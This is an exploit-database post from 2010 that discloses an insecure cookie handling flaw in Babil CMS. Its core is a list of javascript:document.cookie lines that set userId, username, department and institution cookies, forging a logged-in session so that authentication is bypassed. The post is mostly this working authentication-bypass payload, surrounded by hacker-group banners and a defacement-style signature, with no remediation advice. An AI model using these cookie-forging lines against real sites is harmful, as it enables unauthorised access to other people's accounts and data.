Home / os / win7

Babil CMS Insecure Cookie Handling

Posted on 25 December 2010

===================================================
Babilcms <= Insecure Cookie (Handling-Jacking) Exploit
===================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3                                                                      3
3             _     __       __    ________     __  __                 3
7           /'   /'__`   /'__` /\_____     / /                 7
1          /\_, /\_L  /\_L \/___//'/'   \_   \____           1
3          /_/ /_/_\_<_/_/_\_<_   /' /'    /'_`   '__`          3
3               / L  / L  /' /'    / L   L          3
7               \_ \____/  \____//\_/       \___,_ \_,__/         7
1               /_//___/   /___/ //        /__,_ //___/          1
3              >> Exploit database separated by exploit                3
3                     type (local, remote, DoS, etc.)                  3
7                                                                      7
1          [+] Site            : 1337db.com                            1
3          [+] Support e-mail  : submit[at]1337db.com                  3
3                                                                      3
7               ############################################           7
1               I'm KnocKout 1337 Member from 1337 DataBase            1
3               ############################################           3
3                                                                      3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Babil CMS
|~Price : N/A
|~Version : N/A
|~Software: http://www.babilcrm.com/
|~Vulnerability Style : Cookie data Hijack
|~Vulnerability Dir : /
|~Google Keyword : N/A
|[~]Date : "23.12.2010"
|[~]Tested on : (L):Vista (R):DEMO
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
http://www.babilcrm.com/demo/login.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation handling - jacking~}|

javascript:document.cookie="toplamAktivite=7;path=/";
javascript:document.cookie="userId=1;path=/";
javascript:document.cookie="username=babil;path=/";
javascript:document.cookie="departmanId=3;path=/";
javascript:document.cookie="subeId=5;path=/";
javascript:document.cookie="aktifKurumAdi=Babil+CRM;path=/";
javascript:document.cookie="aktifKurumId=1;path=/";
javascript:document.cookie="kurumId=1;path=/";
javascript:document.cookie="soyad=CRM;path=/";
javascript:document.cookie="ad=Babil;path=/";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To your continue..

=============================================================
.__        _____        _______
|  |__    /  |  |___  __   _  \_______   ____
|  |    /   |  |  /  /  /_  \_  __ \_/ __ \n|   H  /    ^   />    <  \_/     | /  ___/
|___|  /\____   |/__/\_ \_____  /__|    \___  >
/      |__|      /      /            /
_____________________________
/   _____/\_   _____/\_   ___ \n\_____    |    __)_ /      /
/         |        \     \____
/_______  //_______  / \______  /
/         /         /   Was here.
================================================================

 

TOP

Malware :

Exploits :